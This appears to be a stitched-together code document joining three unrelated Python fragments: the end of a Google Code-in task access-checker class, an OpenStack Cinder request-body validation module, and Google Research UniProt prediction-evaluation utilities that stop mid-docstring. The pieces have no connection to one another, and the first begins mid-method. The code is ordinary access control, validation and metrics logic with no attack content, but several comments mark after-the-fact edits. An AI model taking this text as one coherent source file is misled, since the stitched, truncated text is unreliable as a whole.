        if not timeline_helper.isActivePeriod(program_entity.timeline, 'program'):
            raise out_of_band.AccessViolation(message_fmt=DEF_PAGE_INACTIVE_MSG)

        # pylint: disable=E1103
        org_entity = role_entity.scope

        if settings.GCI_TASK_QUOTA_LIMIT_ENABLED and check_limit:
            # count all tasks from this organization
            fields = {'scope': org_entity}
            task_query = gci_task_logic.logic.getQueryForFields(fields)

            if task_query.count() >= org_entity.task_quota_limit:
                # too many tasks access denied
                raise out_of_band.AccessViolation(
                    message_fmt=DEF_MAX_TASKS_REACHED_MSG)

        if 'link_id' in django_args:
            task_entity = gci_task_logic.logic.getFromKeyFieldsOr404(django_args)

            # FIX: idiomatic 'not in' instead of 'not x in y'.
            if task_entity.status not in ['Unapproved', 'Unpublished', 'Open',
                                          'ClaimRequested', 'Reopened']:
                # task is claimed at least once
                raise out_of_band.AccessViolation(message_fmt=DEF_CANT_EDIT_MSG)

        return

    @access.allowDeveloper
    @access.denySidebar
    def checkRoleAndStatusForTask(self, django_args, allowed_roles,
                                  role_status, task_status):
        """Checks if the current user has access to the given task.

        This method checks if the current user is in one of the allowed_roles
        and has specified role_status, If yes, allows him to access the Task page.

        Args:
          django_args: a dictionary with django's arguments
          allowed_roles: list with names for the roles allowed to pass access check
          role_status: list with states allowed for the role
          task_status: a list with states allowed for the task

        Raises:
          AccessViolationResponse:
            - If there is no task found
            - If the task is not in one of the required states.
            - If the user does not have any of the required roles
        """

        self.checkIsUser(django_args)

        if 'link_id' in django_args:
            # bail out with 404 if no task is found
            task_entity = gci_task_logic.logic.getFromKeyFieldsOr404(django_args)

            # FIX: idiomatic 'not in' instead of 'not x in y'.
            if task_entity.status not in task_status:
                # this task can not be accessed at the moment
                raise out_of_band.AccessViolation(
                    message_fmt=DEF_NO_ACTIVE_ENTITY_MSG)

        user_entity = self.user

        filter = {
            'user': user_entity,
            'scope_path': django_args['scope_path'],
            'status': role_status
        }

        if 'host' in allowed_roles:
            # check if the current user is a host for this proposal's program
            if host_logic.logic.getForFields(filter, unique=True):
                return

        if 'gci/org_admin' in allowed_roles:
            # check if the current user is an admin for this task's org
            if gci_org_admin_logic.logic.getForFields(filter, unique=True):
                return

        if 'gci/mentor' in allowed_roles:
            # check if the current user is a mentor for this task's org
            if gci_mentor_logic.logic.getForFields(filter, unique=True):
                return

        if 'public' in allowed_roles:
            return

        # no roles found, access denied
        raise out_of_band.AccessViolation(message_fmt=DEF_NEED_ROLE_MSG)

    @access.allowDeveloper
    @access.denySidebar
    def checkStatusForTask(self, django_args):
        """Checks if the current user has access to the given task.

        This method checks if the current user is either an GCI Org Admin or a
        Mentor and is active, if yes it allows them to view the task page at any
        task state. If the user is none of the above, it checks the status of the
        task, and if it is in one of the valid published states it allows access
        to view the task page.

        Args:
          django_args: a dictionary with django's arguments

        Raises:
          AccessViolationResponse:
            - If there is no task found
            - If the task is not in one of the required states.
        """

        user_entity = self.user

        # bail out with 404 if no task is found
        task_entity = gci_task_logic.logic.getFromKeyFieldsOr404(django_args)

        # the task owner may always see their task
        if (user_entity and task_entity.user and
            task_entity.user.key() == user_entity.key()):
            return

        filter = {
            'user': user_entity,
            'status': 'active',
        }

        if host_logic.logic.getForFields(filter, unique=True):
            return

        filter['scope_path'] = django_args['scope_path']

        if gci_org_admin_logic.logic.getForFields(filter, unique=True):
            return

        if gci_mentor_logic.logic.getForFields(filter, unique=True):
            return

        org_entity = gci_org_logic.logic.getFromKeyNameOr404(
            django_args['scope_path'])

        if not timeline_helper.isAfterEvent(org_entity.scope.timeline,
                                            'tasks_publicly_visible'):
            raise out_of_band.AccessViolation(message_fmt=DEF_PAGE_INACTIVE_MSG)

        if task_entity.status in ['Unapproved', 'Unpublished', 'Invalid']:
            # this proposal can not be task at the moment
            raise out_of_band.AccessViolation(
                message_fmt=DEF_NO_PUB_TASK_MSG)

    def checkCanApply(self, django_args):
        """Checks if the user has the completed at least one task to register as
        a student.

        Args:
          django_args: a dictionary with django's arguments

        Raises:
          AccessViolationResponse:
            - If student has not completed even a single task
        """

        self.checkIsUser(django_args)

        program_entity = gci_program_logic.logic.getFromKeyNameOr404(
            django_args['scope_path'])

        filter = {
            'user': self.user,
            'program': program_entity,
            'status': 'AwaitingRegistration',
        }

        if gci_task_logic.logic.getForFields(filter, unique=True):
            return

        # no completed tasks found, access denied
        raise out_of_band.AccessViolation(
            message_fmt=DEF_CANT_REGISTER)

    def checkCanOpenTaskList(self, django_args, role_logic, role):
        """Checks if the current user is allowed to see a list of his tasks.

        Args:
          django_args: a dictionary with django's arguments
          role_logic: the specific role whose logic must be used to check
                      for the scope
          role: name of the role for this check is performed

        Raises:
          AccessViolationResponse:
            - if the user is not registered as a student; and
            - if the user has not claimed a single task
        """

        self.checkIsUser(django_args)

        try:
            return self.checkHasRoleForScope(django_args, role_logic)
        except out_of_band.Error:
            pass

        program = gci_program_logic.logic.getFromKeyNameOr404(
            django_args['scope_path'])

        filter = {
            'program': program,
        }

        if role == 'gci/student':
            filter['user'] = self.user
        elif role == 'gci/mentor':
            mentor_filter = {
                'user': self.user,
                'program': program,
                'status': 'active'
            }
            mentor_entity = role_logic.getForFields(mentor_filter, unique=True)
            filter['mentors'] = [mentor_entity]

        if not gci_task_logic.logic.getForFields(filter, unique=True):
            raise out_of_band.AccessViolation(message_fmt=DEF_NO_TASKS_AFFILIATED)

    def checkTimelineFromTaskScope(self, django_args, status, period_name):
        """Checks the timeline for the program found in the scope variable of a
        Task.

        Args:
          django_args: a dictionary with django's arguments
          status: one of three strings, during which calls isActivePeriod(),
                  before which calls isBeforeEvent() and after which calls
                  isAfterEvent().
          period_name: the name of the period to check the timeline for.

        Raises:
          AccessViolationResponse:
            - if the program is not in a valid state
            - if the period specified does not pass the required status check
        """

        org_entity = gci_org_logic.logic.getFromKeyNameOr404(
            django_args['scope_path'])

        program_args = {'scope_path': org_entity.scope_path}

        # BUG FIX: compare strings with '==' rather than 'is'; identity
        # comparison of strings only works via CPython interning and is
        # not guaranteed for arbitrary callers.
        if status == 'during':
            return self.checkIsActivePeriod(program_args, period_name,
                                            'scope_path', gci_program_logic.logic)
        elif status == 'before':
            return self.checkIsBeforeEvent(program_args, period_name,
                                           'scope_path', gci_program_logic.logic)
        elif status == 'after':
            return self.checkIsAfterEvent(program_args, period_name,
                                          'scope_path', gci_program_logic.logic)

        # no right status set, but we can't give the user access
        raise out_of_band.AccessViolation(message_fmt=DEF_UNEXPECTED_ERROR)

    def checkIsNotStudentForProgramOfOrg(self, django_args, org_logic,
                                         student_logic):
        """Extends the basic with one that checks whether the current user has
        claimed a task in the program.

        Args:
          See Checker.checkIsNotStudentForProgramOfOrg().
        """

        org_entity = super(GCIChecker, self).checkIsNotStudentForProgramOfOrg(
            django_args, org_logic, student_logic)

        fields = {
            'user': self.user,
            'program': org_entity.scope
        }

        if gci_task_logic.logic.getForFields(fields, unique=True):
            raise out_of_band.AccessViolation(message_fmt=DEF_ALREADY_CLAIMED_A_TASK)

        return org_entity

    @access.allowDeveloper
    def checkOrgHasNoOpenTasks(self, django_args):
        """Checks if the organization does not have any tasks which might be
        claimed by students.
        """

        org_entity = gci_org_logic.logic.getFromKeyFieldsOr404(django_args)

        fields = {
            'status': ['Open', 'Reopened'],
            'scope': org_entity
        }

        if gci_task_logic.logic.getForFields(fields, unique=True):
            raise out_of_band.AccessViolation(message_fmt=DEF_ORG_HAS_TASKS)

    @access.allowDeveloper
    @access.denySidebar
    def checkCanDownloadConsentForms(self, django_args, student_logic,
                                     forms_data):
        """Checks if the user is a student who can download the forms i.e.
        the blobs he has requested.

        Args:
          django_args: a dictionary with django's arguments
          student_logic: student logic used to look up student entity
          forms_data: dictionary containing the data related to the forms
              that student should upload and entities that store the form.

        Raises:
          AccessViolationResponse:
            - If there are no forms uploaded for the student.
            - If the logged in user is not the one to whom the form belongs to.
        """

        self.checkIsUser(django_args)

        user_entity = self.user

        try:
            # if the current user is the program host no more access is required
            if self.checkIsHostForProgramInScope(
                    django_args, gci_program_logic.logic):
                return
        except out_of_band.AccessViolation:
            # if the user is not the host proceed for other checks
            # NOTE: This is not combined with the following exception because
            # if we catch AccessViolation there the access check for blob key
            # being null which raises the same exception will also be caught
            pass

        filter = {
            'user': user_entity,
            'status': 'active',
            'scope_path': django_args['scope_path'],
            'link_id': django_args['link_id'],
        }

        student_entity = student_logic.getForFields(filter, unique=True)

        try:
            form_type = django_args['GET'].get('type', '')
            blob_key = django_args['GET'].get('key', '')
            if not blob_key:
                raise out_of_band.AccessViolation(
                    message_fmt=DEF_NO_FILE_SPECIFIED_MSG)

            form_entity_name = forms_data.get(form_type, '')
            form_entity = getattr(student_entity, form_entity_name)
            if blob_key == str(form_entity.key()):
                return
        except AttributeError:
            pass

        raise out_of_band.AccessViolation(message_fmt=DEF_NO_FILE_ACCESS_MSG)
| |
# Copyright (C) 2017 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Internal implementation of request Body validating middleware.
"""
import base64
import re
import jsonschema
from jsonschema import exceptions as jsonschema_exc
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
import webob.exc
from cinder import db
from cinder import exception
from cinder.i18n import _
from cinder.objects import fields as c_fields
from cinder import quota
from cinder import utils
# Module-level aliases for the quota engines, plus the keys that may
# appear in a quota request without being quota resources themselves.
QUOTAS = quota.QUOTAS
GROUP_QUOTAS = quota.GROUP_QUOTAS
NON_QUOTA_KEYS = quota.NON_QUOTA_KEYS
def _soft_validate_additional_properties(
        validator, additional_properties_value, param_value, schema):
    """Validator function.

    If there are not any properties on the param_value that are not specified
    in the schema, this will return without any effect. If there are any such
    extra properties, they will be handled as follows:

    - if the validator passed to the method is not of type "object", this
      method will return without any effect.
    - if the 'additional_properties_value' parameter is True, this method will
      return without any effect.
    - if the schema has an additionalProperties value of True, the extra
      properties on the param_value will not be touched.
    - if the schema has an additionalProperties value of False and there
      aren't patternProperties specified, the extra properties will be stripped
      from the param_value.
    - if the schema has an additionalProperties value of False and there
      are patternProperties specified, the extra properties will not be
      touched and raise validation error if pattern doesn't match.
    """
    # NOTE: because of the ``yield`` below this is a generator function --
    # nothing here (including the stripping branch) runs until jsonschema
    # iterates the returned generator.
    if (not validator.is_type(param_value, "object") or
            additional_properties_value):
        return

    properties = schema.get("properties", {})
    # All pattern keys are folded into one alternation regex.
    patterns = "|".join(schema.get("patternProperties", {}))
    extra_properties = set()
    for prop in param_value:
        if prop not in properties:
            if patterns:
                if not re.search(patterns, prop):
                    extra_properties.add(prop)
            else:
                extra_properties.add(prop)

    if not extra_properties:
        return

    if patterns:
        error = "Additional properties are not allowed (%s %s unexpected)"
        if len(extra_properties) == 1:
            verb = "was"
        else:
            verb = "were"
        yield jsonschema_exc.ValidationError(
            error % (", ".join(repr(extra) for extra in extra_properties),
                     verb))
    else:
        # No patternProperties: silently strip the extras from param_value
        # in place instead of reporting an error.
        for prop in extra_properties:
            del param_value[prop]
def _validate_string_length(value, entity_name, mandatory=False,
                            min_length=0, max_length=None,
                            remove_whitespaces=False):
    """Validate the length of *value*, optionally trimming whitespace first.

    :param value: the string to check
    :param entity_name: name used in error messages
    :param mandatory: when True an empty/None value is rejected
    :param min_length: minimum accepted length
    :param max_length: maximum accepted length (None means unlimited)
    :param remove_whitespaces: True to strip surrounding whitespace before
                               checking the length
    """
    if not value:
        # Absent values are fine unless the caller requires one.
        if not mandatory:
            return True
        msg = _("The '%s' can not be None.") % entity_name
        raise webob.exc.HTTPBadRequest(explanation=msg)

    checked = value.strip() if remove_whitespaces else value
    utils.check_string_length(checked, entity_name,
                              min_length=min_length,
                              max_length=max_length)
@jsonschema.FormatChecker.cls_checks('date-time')
def _validate_datetime_format(param_value):
    """Return True iff *param_value* parses as an ISO 8601 timestamp."""
    try:
        timeutils.parse_isotime(param_value)
    except ValueError:
        return False
    return True
@jsonschema.FormatChecker.cls_checks('name', exception.InvalidName)
def _validate_name(param_value):
    """Reject a name that is None/empty or only whitespace."""
    if not param_value:
        raise exception.InvalidName(reason=_("The 'name' can not be None."))
    if not param_value.strip():
        raise exception.InvalidName(reason=_("The 'name' can not be empty."))
    return True
@jsonschema.FormatChecker.cls_checks('name_skip_leading_trailing_spaces',
                                     exception.InvalidName)
def _validate_name_skip_leading_trailing_spaces(param_value):
    """Validate a name after stripping surrounding whitespace."""
    if not param_value:
        raise exception.InvalidName(reason=_("The 'name' can not be None."))

    stripped = param_value.strip()
    if not stripped:
        raise exception.InvalidName(reason=_("The 'name' can not be empty."))
    if len(stripped) > 255:
        # NOTE(review): this deliberately raises InvalidInput rather than the
        # registered InvalidName, so it propagates out of FormatChecker.check().
        raise exception.InvalidInput(
            reason=_("The 'name' can not be greater than 255 characters."))
    return True
@jsonschema.FormatChecker.cls_checks('uuid')
def _validate_uuid_format(instance):
    """Return True iff *instance* looks like a UUID."""
    looks_like_uuid = uuidutils.is_uuid_like(instance)
    return looks_like_uuid
@jsonschema.FormatChecker.cls_checks('group_snapshot_status')
def _validate_status(param_value):
    """Validate a group-snapshot status string against the known values."""
    if not param_value.strip():
        raise exception.InvalidGroupSnapshotStatus(
            reason=_("The 'status' can not be empty."))
    if param_value.lower() not in c_fields.GroupSnapshotStatus.ALL:
        msg = _("Group snapshot status: %(status)s is invalid, "
                "valid statuses are: "
                "%(valid)s.") % {'status': param_value,
                                 'valid': c_fields.GroupSnapshotStatus.ALL}
        raise exception.InvalidGroupSnapshotStatus(reason=msg)
    return True
@jsonschema.FormatChecker.cls_checks('progress')
def _validate_progress(progress):
    """Validate a progress string such as '75%' (integer percent + '%')."""
    if not progress:
        # Empty/None progress is accepted as-is.
        return True
    try:
        percent = int(progress[:-1])
    except ValueError:
        raise exception.InvalidInput(
            reason=_('progress must be an integer percentage'))
    if progress[-1] != '%' or not 0 <= percent <= 100:
        raise exception.InvalidInput(
            reason=_('progress must be an integer percentage between'
                     ' 0 and 100'))
    return True
@jsonschema.FormatChecker.cls_checks('base64')
def _validate_base64_format(instance):
    """Return True iff *instance* decodes as base64."""
    if isinstance(instance, six.text_type):
        instance = instance.encode('utf-8')
    try:
        # NOTE(review): base64.decodestring is deprecated in favour of
        # decodebytes on Python 3; kept here for Python 2 compatibility.
        base64.decodestring(instance)
    except base64.binascii.Error:
        return False
    except TypeError:
        # Non-bytes input (e.g. an int) raises TypeError at this point.
        return False
    return True
@jsonschema.FormatChecker.cls_checks('disabled_reason')
def _validate_disabled_reason(param_value):
    """Validate an optional disabled_reason: 1-255 chars after trimming."""
    constraints = dict(mandatory=False, min_length=1,
                       max_length=255, remove_whitespaces=True)
    _validate_string_length(param_value, 'disabled_reason', **constraints)
    return True
@jsonschema.FormatChecker.cls_checks('quota_set')
def _validate_quota_set(quota_set):
    """Validate quota keys and their integer values in one pass."""
    bad_keys = []
    for key, value in quota_set.items():
        known = (key in QUOTAS or key in GROUP_QUOTAS
                 or key in NON_QUOTA_KEYS)
        if not known:
            bad_keys.append(key)
        elif key not in NON_QUOTA_KEYS:
            # Only real quota resources carry an integer limit.
            utils.validate_integer(value, key, min_value=-1,
                                   max_value=db.MAX_INT)

    if bad_keys:
        msg = _("Bad key(s) in quota set: %s") % ", ".join(bad_keys)
        raise exception.InvalidInput(reason=msg)
    return True
@jsonschema.FormatChecker.cls_checks('quota_class_set')
def _validate_quota_class_set(instance):
    """Reject quota-class keys that are not known quota resources."""
    bad_keys = [key for key in instance
                if key not in QUOTAS and key not in GROUP_QUOTAS]
    if bad_keys:
        msg = _("Bad key(s) in quota class set: %s") % ", ".join(bad_keys)
        raise exception.InvalidInput(reason=msg)
    return True
@jsonschema.FormatChecker.cls_checks(
    'group_status', webob.exc.HTTPBadRequest)
def _validate_group_status(param_value):
    """Validate a group status string.

    Raises HTTPBadRequest for None, InvalidGroupStatus for an empty or
    unknown status; returns True otherwise.
    """
    if param_value is None:
        msg = _("The 'status' can not be None.")
        raise webob.exc.HTTPBadRequest(explanation=msg)
    if len(param_value.strip()) == 0:
        msg = _("The 'status' can not be empty.")
        raise exception.InvalidGroupStatus(reason=msg)
    # BUG FIX: the membership check previously used GroupSnapshotStatus.ALL
    # while the error message advertises GroupStatus.ALL as the valid set;
    # a group status must be validated against the group status values.
    if param_value.lower() not in c_fields.GroupStatus.ALL:
        msg = _("Group status: %(status)s is invalid, valid status "
                "are: %(valid)s.") % {'status': param_value,
                                      'valid': c_fields.GroupStatus.ALL}
        raise exception.InvalidGroupStatus(reason=msg)
    return True
@jsonschema.FormatChecker.cls_checks('availability_zone')
def _validate_availability_zone(param_value):
    """Check that an availability zone is None or a 1-255 char string."""
    if param_value is None:
        # An unset availability zone is acceptable.
        return True
    _validate_string_length(
        param_value, "availability_zone", mandatory=True,
        min_length=1, max_length=255, remove_whitespaces=True)
    return True
@jsonschema.FormatChecker.cls_checks(
    'group_type', (webob.exc.HTTPBadRequest, exception.InvalidInput))
def _validate_group_type(param_value):
    """Check that a group type is a mandatory 1-255 char string."""
    _validate_string_length(
        param_value, 'group_type', mandatory=True,
        min_length=1, max_length=255, remove_whitespaces=True)
    return True
class FormatChecker(jsonschema.FormatChecker):
    """A FormatChecker that can surface the message of a cause exception.

    We need understandable validation error messages for users. When a
    custom checker raises, this class keeps the readable message provided
    by the checker and attaches it as the cause of the FormatError.
    """

    def check(self, param_value, format):
        """Check whether ``param_value`` conforms to the given format.

        :argument param_value: the value to check
        :type: any primitive type (str, number, bool)
        :argument str format: the format that param_value should conform to
        :raises: :exc:`FormatError` if param_value does not conform to format
        """
        try:
            checker_func, allowed_exceptions = self.checkers[format]
        except KeyError:
            # Unknown formats are simply not checked.
            return
        # For safety reasons custom checkers can be registered with
        # allowed exception types. Anything else will fall into the
        # default formatter.
        outcome = None
        cause = None
        try:
            outcome = checker_func(param_value)
        except allowed_exceptions as exc:
            cause = exc
        if not outcome:
            raise jsonschema_exc.FormatError(
                "%r is not a %r" % (param_value, format), cause=cause)
class _SchemaValidator(object):
    """A validator class.

    This class is changed from Draft4Validator to validate minimum/maximum
    value of a string number(e.g. '10'). This changes can be removed when
    we tighten up the API definition and the XML conversion.
    Also FormatCheckers are added for checking data formats which would be
    passed through cinder api commonly.
    """
    validator = None
    validator_org = jsonschema.Draft4Validator

    def __init__(self, schema, relax_additional_properties=False):
        """Build a Draft4-based validator for ``schema``."""
        extra_validators = {
            'minimum': self._validate_minimum,
            'maximum': self._validate_maximum,
        }
        if relax_additional_properties:
            # Tolerate unknown properties instead of failing validation.
            extra_validators['additionalProperties'] = (
                _soft_validate_additional_properties)
        validator_cls = jsonschema.validators.extend(
            self.validator_org, extra_validators)
        self.validator = validator_cls(schema, format_checker=FormatChecker())

    def validate(self, *args, **kwargs):
        """Validate a body, re-raising readable ValidationErrors."""
        try:
            self.validator.validate(*args, **kwargs)
        except jsonschema.ValidationError as ex:
            if isinstance(ex.cause, exception.InvalidName):
                detail = ex.cause.msg
            elif ex.path:
                # Include the offending field and value in the message.
                detail = _("Invalid input for field/attribute %(path)s."
                           " Value: %(value)s. %(message)s") % {
                    'path': ex.path.pop(), 'value': ex.instance,
                    'message': ex.message}
            else:
                detail = ex.message
            raise exception.ValidationError(detail=detail)
        except TypeError as ex:
            # NOTE: If passing non string value to patternProperties
            # parameter, TypeError happens; it is caught here.
            detail = six.text_type(ex)
            raise exception.ValidationError(detail=detail)

    def _number_from_str(self, param_value):
        """Return param_value coerced to int or float, or None if neither."""
        for converter in (int, float):
            try:
                return converter(param_value)
            except (ValueError, TypeError):
                continue
        return None

    def _validate_minimum(self, validator, minimum, param_value, schema):
        # Accept numeric strings such as '10' by coercing before comparing.
        number = self._number_from_str(param_value)
        if number is None:
            return
        return self.validator_org.VALIDATORS['minimum'](validator, minimum,
                                                        number, schema)

    def _validate_maximum(self, validator, maximum, param_value, schema):
        # Accept numeric strings such as '10' by coercing before comparing.
        number = self._number_from_str(param_value)
        if number is None:
            return
        return self.validator_org.VALIDATORS['maximum'](validator, maximum,
                                                        number, schema)
| |
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluation utilities for uniprot predictions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import itertools
from typing import Dict, FrozenSet, List, Optional, Sequence, Set, Text, Tuple, Union
import numpy as np
import pandas as pd
from pandas.core.groupby.generic import DataFrameGroupBy as pd_DataFrameGroupBy
import inference
import parenthood_lib
import sklearn.metrics
import tqdm
# Dictionary keys naming prediction error categories.
FALSE_NEGATIVES_KEY = 'false_negatives'
FALSE_POSITIVES_KEY = 'false_positives'
TRUE_POSITIVES_KEY = 'true_positives'
# (precision, recall, f1) triple, e.g. as returned by precision_recall_f1.
PrecisionRecallF1 = Tuple[float, float, float]
def normalize_confidences(
    predictions, label_vocab,
    applicable_label_dict):
  """Set confidences of parent labels to the max of their children.

  Args:
    predictions: [num_sequences, num_labels] ndarray.
    label_vocab: list of vocab strings in an order that corresponds to
      `predictions`.
    applicable_label_dict: Mapping from labels to their parents (including
      indirect parents).

  Returns:
    A numpy array [num_sequences, num_labels] with confidences where:
    if label_vocab[k] in applicable_label_dict[label_vocab[j]],
    then arr[i, j] >= arr[i, k] for all i.
  """
  index_of_label = {label: idx for idx, label in enumerate(label_vocab)}
  children = parenthood_lib.reverse_map(applicable_label_dict,
                                        set(index_of_label.keys()))
  # Only vectorize this along the sequences dimension as the number of
  # children varies between labels.
  per_label_columns = []
  for label in label_vocab:
    child_columns = np.array(
        [index_of_label[child] for child in children[label]])
    if child_columns.size > 1:
      # A parent's confidence is the max over its children's columns.
      per_label_columns.append(np.max(predictions[:, child_columns], axis=1))
    else:
      per_label_columns.append(predictions[:, index_of_label[label]])
  return np.stack(per_label_columns, axis=1)
def get_ground_truth_multihots(label_sets,
                               label_vocab):
  """Get a multihot matrix from label sets and a vocab."""
  index_of_label = {label: idx for idx, label in enumerate(label_vocab)}
  num_labels = len(label_vocab)
  rows = []
  for label_set in label_sets:
    # One row per example; 1.0 wherever the example carries the label.
    row = np.zeros([num_labels])
    row[np.array([index_of_label[label] for label in label_set],
                 dtype=np.int32)] = 1
    rows.append(row)
  return np.vstack(rows)
def get_pr_f1_df_from_arrays(
    ground_truths,
    normalized_predictions,
    prediction_precision_limit = None,
):
  """Convenience method for making a PR curve dataframe.

  Args:
    ground_truths: multihot array of shape (num_examples, num_labels).
    normalized_predictions: array of shape (num_samples, num_labels).
    prediction_precision_limit: Used to truncate the predictions to a fixed
      level of precision (number of decimal places). Truncation speeds up
      the computation and shrinks the returned dataframe. If None, no
      truncation is performed.

  Returns:
    pd.DataFrame with columns precision (float); recall (float);
    threshold (float); f1 (float).
  """
  if prediction_precision_limit:
    # Rounding collapses near-identical confidences, reducing the number
    # of distinct thresholds sklearn has to evaluate.
    normalized_predictions = np.around(normalized_predictions,
                                       prediction_precision_limit)
  precisions, recalls, thresholds = sklearn.metrics.precision_recall_curve(
      ground_truths.flatten(), normalized_predictions.flatten())
  # sklearn appends a final (precision=1, recall=0) point that has no
  # associated threshold; drop it so all columns line up.
  precisions = precisions[:-1]
  recalls = recalls[:-1]
  f1s = 2 * (precisions * recalls) / (precisions + recalls)
  return pd.DataFrame(
      data={
          'precision': precisions,
          'recall': recalls,
          'threshold': thresholds,
          'f1': f1s
      })
def get_pr_f1_df(
    prediction_df,
    label_vocab,
    label_normalizer,
    eval_vocab = None,
    prediction_precision_limit = 18,
):
  """Make a dataframe of precision/recall/f1 for every threshold.

  Args:
    prediction_df: A dataframe with columns `predictions` and `true_label`.
    label_vocab: A list of labels.
    label_normalizer: A mapping from labels to their children.
    eval_vocab: An optional subset of `label_vocab` on which to restrict
      analysis.
    prediction_precision_limit: Used to truncate the predictions to a fixed
      number of decimal places for speed and output size. If None, no
      truncation is performed.

  Returns:
    A dataframe with 4 columns: precision, recall, f1, and threshold. At each
    threshold precision, recall, and f1 are calculated relative to the
    normalized confidences and true labels given in `prediction_df`.
  """
  if not eval_vocab:
    eval_vocab = set(label_vocab)
  label_vocab = np.array(label_vocab)
  raw_predictions = np.vstack(prediction_df.predictions)
  normalized = normalize_confidences(raw_predictions, label_vocab,
                                     label_normalizer)
  # Restrict both ground truth and predictions to the evaluation vocab.
  true_label_sets = prediction_df.true_label.apply(
      eval_vocab.intersection).values
  eval_indices = np.array(
      [idx for idx, label in enumerate(label_vocab) if label in eval_vocab])
  ground_truths = get_ground_truth_multihots(true_label_sets,
                                             label_vocab[eval_indices])
  return get_pr_f1_df_from_arrays(ground_truths, normalized[:, eval_indices],
                                  prediction_precision_limit)
def true_false_positive_negative_df(df):
  """Computes df of all example/label pairs, and whether they were correct.

  Args:
    df: pd.Dataframe that has columns: true_label. Contains a set of true
      labels. predicted_label. Contains a set of predicted labels.
      sequence_name. string. Accession.

  Returns:
    pd.DataFrame that has columns:
      sequence_name. string. Name of sequence (accession).
      class. string. Class name. Either predicted or true.
      predicted. bool. Whether the class was predicted for the sequence.
      true. bool. Whether the class label is true for the sequence.
      true_positive. Whether the prediction is a true positive.
      false_positive. Whether the prediction is a false positive.
      false_negative. Whether the prediction is a false negative.
  """
  dict_prep_for_df = {
      'sequence_name': [],
      'class': [],
      'predicted': [],
      'true': []
  }
  for _, row in tqdm.tqdm(df.iterrows(), position=0, total=len(df)):
    # Every class that is either predicted or true yields one output row.
    all_classes = row.predicted_label.union(row.true_label)
    for cls in all_classes:
      dict_prep_for_df['sequence_name'].append(row.sequence_name)
      dict_prep_for_df['class'].append(cls)
      dict_prep_for_df['predicted'].append(cls in row.predicted_label)
      dict_prep_for_df['true'].append(cls in row.true_label)
  working_df = pd.DataFrame(dict_prep_for_df)
  # NOTE: np.bool was a deprecated alias for the builtin bool and was
  # removed in NumPy 1.24; use the builtin directly.
  working_df.predicted = working_df.predicted.astype(bool)
  working_df.true = working_df.true.astype(bool)
  working_df['true_positive'] = working_df.predicted & working_df.true
  working_df['false_positive'] = working_df.predicted & ~working_df.true
  working_df['false_negative'] = ~working_df.predicted & working_df.true
  return working_df
def multilabel_precision_per_example_label_pair(
    df):
  """Computes precision score of predictions in dataframe.

  Each (example, prediction) pair counts as "one" toward the precision. This
  is different than counting each class equally, or counting each example
  evenly.

  Args:
    df: E.g. output of true_false_positive_negative_df that has columns
      true_positive. bool. false_positive. bool.

  Returns:
    precision. Does not consider any thresholds.
  """
  num_true_positives = df.true_positive.sum().astype(float)
  num_false_positives = df.false_positive.sum().astype(float)
  # precision = TP / (TP + FP)
  return num_true_positives / (num_true_positives + num_false_positives)
def multilabel_recall_per_example_label_pair(
    df):
  """Computes recall score of predictions in dataframe.

  (The previous docstring incorrectly said "f1 score"; this computes recall.)
  Each (example, prediction) pair counts as "one" toward the recall. This is
  different than counting each class equally, or counting each example evenly.

  Args:
    df: E.g. output of true_false_positive_negative_df that has columns
      true_positive. bool. false_negative. bool.

  Returns:
    recall. Does not consider any thresholds.
  """
  true_positive = df.true_positive.sum().astype(float)
  false_negative = df.false_negative.sum().astype(float)
  # recall = TP / (TP + FN)
  return true_positive / (true_positive + false_negative)
def multilabel_f1_per_example_label_pair(
    df):
  """Computes f1 score of predictions in dataframe.

  Each (example, prediction) pair counts as "one" toward the f1 score. This is
  different than counting each class equally, or counting each example evenly.

  Args:
    df: has columns: true_positive. bool. false_positive. bool.
      false_negative. bool.

  Returns:
    f1 score. Harmonic mean of precision and recall. Does not consider any
    thresholds.
  """
  p = multilabel_precision_per_example_label_pair(df)
  r = multilabel_recall_per_example_label_pair(df)
  # Harmonic mean of precision and recall.
  return 2. * (p * r) / (p + r)
def normalize_predictions(
    to_normalize,
    normalize_map):
  """Maps each label through `normalize_map` and flattens to a frozenset."""
  mapped = (normalize_map[label] for label in to_normalize)
  return frozenset(itertools.chain.from_iterable(mapped))
def precision_recall_f1(
    df,
    label_normalizing_dict):
  """Returns precision, recall, and f1 for a dataframe.

  Args:
    df: pd.DataFrame with columns sequence_name, true_label, and
      predicted_label.
    label_normalizing_dict: dictionary of label to implied labels. Used to
      normalize labels into canonical form (e.g. an obsolete label is
      normalized into its replacement). See
      parenthood_lib.get_applicable_label_dict.

  Returns:
    PrecisionRecallF1.
  """
  prepped = pd.DataFrame()
  prepped['sequence_name'] = df.sequence_name
  # Normalize predictions into canonical form before scoring.
  prepped['predicted_label'] = df.predicted_label.apply(
      lambda labels: normalize_predictions(labels, label_normalizing_dict))
  prepped['true_label'] = df.true_label
  pair_df = true_false_positive_negative_df(prepped)
  return (multilabel_precision_per_example_label_pair(pair_df),
          multilabel_recall_per_example_label_pair(pair_df),
          multilabel_f1_per_example_label_pair(pair_df))
def filter_predictions_to_above_threshold(
    predictions, decision_threshold,
    label_vocab):
  """Computes predictions above `decision_threshold` for each example.

  Args:
    predictions: np.array, (2-d) of float. Outer dimension is example, inner
      dimension is class label. I.e. predictions[2, 3] is the probability
      that for example 2, the third class is true.
    decision_threshold: float. Classes with predictions above this threshold
      will be included in the output.
    label_vocab: np.array (1-d) of string. List of classes that corresponds
      to prediction.

  Returns:
    List of FrozenSet. Outer dimension is the example number within this
    batch, inner is a set of labels predicted that have confidence over
